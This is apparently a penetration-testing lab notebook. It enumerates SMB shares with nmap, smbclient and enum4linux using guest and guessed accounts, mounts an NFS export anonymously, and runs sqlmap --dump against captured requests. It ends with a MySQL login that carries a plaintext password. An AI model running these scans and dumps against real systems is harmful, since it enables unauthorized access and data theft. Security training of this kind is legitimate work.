# ASSIGNMENT

# Service Enumeration:

In [1]:
%env TARGET=10.11.1.74

env: TARGET=10.11.1.74


# SMB:

In [2]:
!nmap -v -sV --open -Pn  -p 137,139,445 --script=smb-ls $TARGET

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-20 18:33 PDT
NSE: Loaded 46 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:33
Completed NSE at 18:33, 0.00s elapsed
Initiating NSE at 18:33
Completed NSE at 18:33, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 18:33
Completed Parallel DNS resolution of 1 host. at 18:33, 0.01s elapsed
Initiating Connect Scan at 18:33
Scanning 10.11.1.74 [3 ports]
Discovered open port 139/tcp on 10.11.1.74
Discovered open port 445/tcp on 10.11.1.74
Completed Connect Scan at 18:33, 0.36s elapsed (3 total ports)
Initiating Service scan at 18:33
Scanning 2 services on 10.11.1.74
Completed Service scan at 18:33, 11.48s elapsed (2 services on 1 host)
NSE: Script scanning 10.11.1.74.
Initiating NSE at 18:33
Completed NSE at 18:33, 0.01s elapsed
Initiating NSE at 18:33
Completed NSE at 18:33, 0.00s elapsed
Nmap scan report for 1

In [3]:
!nmap -v -sV --open -Pn  -p 137,139,445 --script=smb-os-discovery,smb-enum-shares,smb-security-mode $TARGET --script-args=smbbasic=1,smbsign=ignore | tee smb_results.txt

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-20 18:33 PDT
NSE: Loaded 48 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 18:33
Completed NSE at 18:33, 0.00s elapsed
Initiating NSE at 18:33
Completed NSE at 18:33, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 18:33
Completed Parallel DNS resolution of 1 host. at 18:33, 0.02s elapsed
Initiating Connect Scan at 18:33
Scanning 10.11.1.74 [3 ports]
Discovered open port 139/tcp on 10.11.1.74
Discovered open port 445/tcp on 10.11.1.74
Completed Connect Scan at 18:33, 0.10s elapsed (3 total ports)
Initiating Service scan at 18:33
Scanning 2 services on 10.11.1.74
Completed Service scan at 18:33, 13.08s elapsed (2 services on 1 host)
NSE: Script scanning 10.11.1.74.
Initiating NSE at 18:33
Completed NSE at 18:34, 30.00s elapsed
Initiating NSE at 18:34
Completed NSE at 18:34, 0.00s elapsed
Nmap scan report for 

In [4]:
import os

try:
    result = !cat smb_results.txt | grep account_used

    anon_user = result[0].split(':')[-1].strip()
except:
    anon_user = "guest"

if anon_user == '<blank>':
    anon_user = "guest"
anon_user

'guest'

In [5]:
!~/hax/enum4linux.pl -a -u {anon_user} {os.environ['TARGET']}

zsh:1: no such file or directory: ./enum4linux.pl


In [6]:
!~/hax/enum4linux.pl $TARGET

zsh:1: no such file or directory: ./enum4linux.pl


In [7]:
!~/hax/enum4linux.pl -u administrator $TARGET 

zsh:1: no such file or directory: ./enum4linux.pl


In [8]:
!~/hax/enum4linux.pl -u guest $TARGET 

zsh:1: no such file or directory: ./enum4linux.pl


In [9]:
!~/hax/enum4linux.pl -u john $TARGET 

zsh:1: no such file or directory: ./enum4linux.pl


In [ ]:
!smbclient -L $TARGET -U guest

Enter WORKGROUP\guest's password: 

In [ ]:
%env SHARE=Users

In [ ]:
!echo Run this:
!echo cd \'$(pwd)\'
!echo smbclient //$TARGET/$SHARE -U guest

In [ ]:
from web_footprinting_utils import show_term

show_term()

#### Use ls, get, cd to pull down any needed files in SMB...

In [ ]:
!ls

In [ ]:
!cat log.txt

# NFS Anonymous Mounting:

In [ ]:
from getpass import getpass
import os

%env RDIR = /var

In [ ]:
# !mkdir -p my_mount
# !echo { getpass() } | sudo -S sudo mount {os.environ['TARGET']}:{os.environ['RDIR']} my_mount
# !ls -la my_mount

# SQL Map:

In [ ]:
!sqlmap -r bugle_user.txt --dbms=mariadb --dump --batch

In [ ]:
!sqlmap -r bugle_admin.txt --dbms=mariadb --dump --batch

In [ ]:
!sqlmap -r bugle_admin.txt --dbms=mariadb --dump --batch --level=5

# SQL Login:

In [ ]:
mysql -h 127.0.0.1 -u techblog -p'z8n#DZf@Sa#X!4@tqG'

# FTP:

ftp 10.10.28.39

anonymous

no password

#### remember to enable binary mode to download binaries:

binary